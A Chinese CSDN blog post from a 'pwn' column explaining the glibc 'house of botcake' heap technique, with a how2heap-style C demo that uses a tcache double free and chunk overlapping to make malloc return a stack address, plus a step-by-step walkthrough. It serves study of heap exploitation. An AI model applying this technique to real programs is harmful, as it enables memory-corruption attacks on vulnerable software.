house_of_botcake

最新推荐文章于 2024-08-06 10:22:43 发布
最新推荐文章于 2024-08-06 10:22:43 发布
阅读量173 收藏
点赞数 1
分类专栏: pwn 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62326489/article/details/126574297
版权

house_of_botcake

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main(){
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    puts("house_of_botcake 是针对 glibc2.29 对 tcache double free 做出限制以后提出的利用方法");
    intptr_t stack_var[4];
    printf("我们希望 malloc 到的地址是 %p.\n\n", stack_var);

    puts("malloc 7 个 chunk 以便稍后填满 tcache");
    intptr_t *x[7];
    for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
        x[i] = malloc(0x100);
    }

    intptr_t *prev = malloc(0x100);
    printf("malloc(0x100): prev=%p. 待会用\n", prev); 
    intptr_t *a = malloc(0x100);
    printf("再 malloc(0x100): a=%p. 作为攻击的 chunk\n", a); 
    puts("最后 malloc(0x10) 防止与 top chunk 合并\n");
    malloc(0x10);
    
    puts("接下来构造 chunk overlapping");
    puts("第一步: 填满 tcache 链表");
    for(int i=0; i<7; i++){
        free(x[i]);
    }
    puts("第二步: free 掉 chunk a,放入 unsorted bin 中");
    free(a);
    
    puts("第三步: 释放掉 chunk prev 因为后面是一个 free chunk,所以他会与 chunk a 合并");
    free(prev);
    
    puts("第四步: 这时候已经没有指向 chunk a 的指针了,从 tcache 中取出一个,然后再次 free(a) 就把 chunk a 加入到了 tcache 中,造成了 double free \n");
    malloc(0x100);
    free(a);

    puts("再去 malloc 一个 0x120 会从 unsorted bin 中分割出来,也就控制了前面已经合并的那个 chunk a 了");
    intptr_t *b = malloc(0x120);
    puts("把 chunk a 的指针给改为前面声明的 stack_var 的地址");
    b[0x120/8-2] = (long)stack_var;
    malloc(0x100);
    puts("去 malloc 一个就能申请到 stack_var 了");
    intptr_t *c = malloc(0x100);
    printf("新申请的 chunk 在:%p\n", c);
    return 0;
}

2应用

利用tcache进行malloc到任意地址

3原理

这边主要用的是一个堆重叠的原理(overlapping)

首先我们申请七个堆块

for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
        x[i] = malloc(0x100);
    }

这边的七个堆块都没啥用,单纯用来填满tacache

 

然后申请8号和9号堆块

intptr_t *prev = malloc(0x100);
    printf("malloc(0x100): prev=%p. 待会用\n", prev); 
    intptr_t *a = malloc(0x100);
    printf("再 malloc(0x100): a=%p. 作为攻击的 chunk\n", a);

最后申请一个0x10的堆块防止和top chunk合并

 

然后首先把之前的七个释放填满tcache

for(int i=0; i<7; i++){
        free(x[i]);
    }

 

然后把之前最后申请的两个堆块释放,这样8号和9号堆快就被放入了unstored bin里面,然后两个玩意就合并了

 

 

此时我们在申请一个大小为0x100的堆块出来(这个堆块是从tache里面出来的,同时也是之前的第七个chunk),

 

此时我们再次free掉9号堆块,就会把9号堆块再次放入tacahe里从而达到double free的目的

 

次是我们所申请的0x120的堆块将从之前合并的8号和9好的堆块里,也就是unstored bin里切割出来一部分,剩下的就是很经典的overlapping

 

此时我们可以通过修改最后申请出来的10号堆来更改9号堆的内容,

 

 

而此时只要我们将9号堆的fd指针修改为我们想要的地址,那么此时的tacahe链因为刚好9号堆在tacahe的头部而产生断链,此时我们就可以去往我们想要去的地址

此时我们只要malloc两次就能得到想要的chunk

 

名字被注册了诶
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020祥云杯 CTFNu1L.pdf
03-15
2020祥云杯 CTF WP 高清PDF版
kc_house_data.rar
10-11
KC_House_Data.csv 文件是 King County(金县)的房价数据集,通常用于教学和实践机器学习项目,特别是在华盛顿大学的课程中。这个数据集包含了大量关于房屋特征和价格的信息,为初学者提供了理解如何利用统计和机器...
house of botcake利用模板+爆破stdout泄露地址 glibc2.31
FUCKING12的博客
11-06 177
【代码】house of botcake利用模板+爆破stdout泄露地址。
how2heap 深入学习(6)
CoLin的pwn小屋
03-12 680
how2heap glibc 2.27学习
dlmalloc、ptmalloc与glibc堆漏洞利用
有价值炮灰
04-12 1383
本文主要介绍dlmalloc、ptmalloc的详细原理,并分析几个常见的漏洞利用方法。
C++复习整理---指针、函数、const相关
DannieG的博客
10-13 135
指针int *p p:p指向的地址 *p:p指向的地址上的值 &p:存放指针p的地址 const const int p int const p 这两个相同的 指向整型常量的指针,指向的位置的值不能改变,可以改指针本身。理解成先const int或int const,再为指针。 就可以让这个指针指向有另一个值的另一个位置。 如果想要在同一个位置改值,就可以先让另一个指针指向这个位置,然后再从另一个指针改值。 比如: int u = (int)p;//得有(int),不然会提示是const int*
2.27 house of botcake
2301_79879963的博客
05-31 1505
2.23-2.39 都有double free 针对fastbin2.27-2.35 tcachebin引入之后没有double free,但是可以有其他方式来间接实现double free理论上的double free:free 0xa0大小的堆块进入tcachebin 满7个(实际下标为0-6),free第8个同大小堆块时则会进入unsortedbin,这时从tcachebin申请回来一个堆块,再free第8个堆块,就进入了tcachebin,这样实现了理论上的double free,但是实际上这样操作
how2heap2.31学习(2)
m0_51251108的博客
10-01 1023
how2heaplibc2.31的house部分
jj.rar_house_jjdsw txt
09-19
【标题】"jj.rar" 和 "house_jjdsw txt" 提示我们这可能与家居设计或室内装饰有关,其中 "jjdsw" 可能是某个特定的设计风格或项目的缩写,而 ".txt" 表明包含的文字资料。在 IT 领域,这种格式通常用于文本文件,...
CDMA.RF.rar_ARTECH HOUSE_house_rf
09-14
《CDMA RF System Engineering》是Artech House出版的一本关于无线通信领域中码分多址(Code Division Multiple Access, CDMA)射频系统工程的专业书籍。这本书深入探讨了CDMA技术在射频系统设计和实施中的关键概念...
house_price.zip
01-15
《Kaggle房价预测实战:探索与分析"house_price.zip"数据集》 在数据分析领域,Kaggle竞赛是广大爱好者和专业人士展示技能的重要舞台。本次我们关注的是一个名为"House Prices - Advanced Regression Techniques"的...
system_of_house_measure.rar_house
09-21
《房屋测量系统详解》 在数字化时代,房屋测量已经不再局限于传统的实地测量工具,而是借助先进的计算机技术,形成了一套高效、精准的房屋测量系统。本文将深入探讨这个系统的基本构成,以及它如何集成地图软件要素...
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 515
使用TCP协议支持与多个客户端同时通信。
C++ - 函数重载
最新发布
jiaowenjie的专栏
08-06 280
/打印的是第二个函数的地址。//打印的是第一个函数的地址。-> 重载函数在本质上是相互独立的不同函数。-> 函数返回值不能作为函数重载的依据。-> 重载函数的函数类型不同。**3.函数默认参数和函数重载****函数重载的注意事项:****4.函数重载的本质**
SpringBoot+Vue图书(图书借阅)管理系统-附项目源码与配套文档
m0_74283290的博客
08-03 1346
本论文阐述了一套先进的图书管理系统的设计与实现,该系统采用Java语言,结合现代Web开发框架和技术,旨在为图书馆提供高效、灵活且用户友好的资源管理解决方案。系统利用Spring Boot框架为核心,整合MyBatis ORM工具,以及MySQL数据库,构建了一个高性能、可扩展的后端服务。前端界面则采用了Vue.js框架,以提供流畅的用户交互体验。论文首先进行了详尽的需求分析,确定了系统的核心功能,包括图书的添加、编辑、删除、查询,读者的注册、登录、个人信息管理,以及图书的借阅、归还、续借流程。
枚举工具类
qq_43049583的博客
08-04 504
java枚举工具类
时光不等人:java每日一练
m0_67187271的博客
08-05 1051
时光悄然流逝,不等人。技术亦不会自来门前,唯有勤奋学习,方能抓住时代的脉搏。
等待唤醒机制两种实现方法-阻塞队列
泰勒今天想展开的博客
08-04 579
桌子上有面条-》吃货执行桌子上没面条-》生产者制造执行。
Servlet(2)
xjdkxnhcoskxbco的博客
08-04 802
这个注解可以用来修饰一个Servlet类,可以简化配置,替代Web.xml中 的servlet配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值